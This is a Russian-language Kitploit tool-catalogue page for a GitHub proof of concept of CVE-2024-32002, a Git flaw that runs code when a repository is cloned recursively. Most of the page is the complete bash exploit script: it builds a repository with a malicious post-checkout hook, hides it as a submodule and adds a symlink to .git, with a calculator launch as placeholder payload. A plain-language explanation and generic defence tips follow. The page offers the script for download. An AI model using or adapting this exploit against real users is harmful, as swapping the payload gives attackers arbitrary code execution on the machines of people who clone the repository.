Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-32002-poc — CVE-2024-32002 — это критическая уязвимость в Git, которая позволяет злоумышленнику удаленно выполнять произвольный код (RCE) при выполнении пользователем команды git clone. | Kitploit
Инструменты/GitHubGitHub/bohemianhacks/cve-2024-32002-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubbohemianhacks/cve-2024-32002-poc

CVE-2024-32002-poc

CVE-2024-32002 — это критическая уязвимость в Git, которая позволяет злоумышленнику удаленно выполнять произвольный код (RCE) при выполнении пользователем команды git clone.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
111 год назадЕщё не проверено

Bash-скрипт:

root@kitploit:~
#!/bin/bash

# Set Git configuration options
git config --global protocol.file.allow always
git config --global core.symlinks true
# Avoid warning messages (set default branch to main)
git config --global init.defaultBranch main 

# Define tell-tale path
tell_tale_path="$PWD/tell.tale"

# Initialize hook repository
git init hook
cd hook
mkdir -p y/hooks

# Write malicious code to hook, compatible with Windows and macOS
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe
open -a Calculator.app
EOF

# Make hook executable: important
chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"

cd ..

# Define hook repository path
hook_repo_path="$(pwd)/hook"

# Initialize captain repository
git init captain
cd captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m "add-submodule"

# Create symbolic link
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
cd ..

# Local testing (not needed for GitHub)
git clone --recursive captain hooked

Простое объяснение на английском:

Этот Bash-скрипт создаёт вредоносный Git-репозиторий, который использует уязвимость (CVE-2024-32002) для выполнения вредоносного кода при клонировании репозитория другим пользователем.

Вот что делает скрипт:

  1. Настраивает конфигурацию Git: Включает определённые функции, необходимые для атаки.
  2. Создаёт вредоносный репозиторий с хуком: Этот репозиторий содержит скрытый скрипт, который запустится при клонировании.
  3. Создаёт обманный репозиторий: Репозиторий с именем «captain» выглядит безвредным, но скрыто содержит вредоносный репозиторий-хук в качестве подмодуля.
  4. Добавляет символическую ссылку: Эта уловка используется, чтобы спрятать вредоносный хук и заставить его выполниться при клонировании репозитория.

Когда кто-то клонирует репозиторий «captain», вредоносный скрипт запустится на его компьютере, что может привести к опасным последствиям, таким как:

  • Установка вредоносного ПО: Скрипт может загрузить и установить вредоносное программное обеспечение.
  • Кража данных: Возможно хищение конфиденциальных данных с компьютера жертвы.
  • Компрометация системы: Скрипт может получить несанкционированный доступ к системе.

Чтобы защититься от подобных атак:

  • Обновляйте ваш Git-клиент: Убедитесь, что у вас установлена последняя версия, чтобы устранить уязвимости.
  • Будьте осторожны при клонировании репозиториев: Клонируйте репозитории только из доверенных источников.
  • Используйте надёжную антивирусную программу: Это поможет обнаружить и заблокировать вредоносное ПО.
  • Остерегайтесь фишинговых атак: Не переходите по подозрительным ссылкам и не скачивайте файлы из неизвестных источников.

Соблюдая эти меры предосторожности, вы сможете значительно снизить риск стать жертвой подобных атак.

Скачать инструмент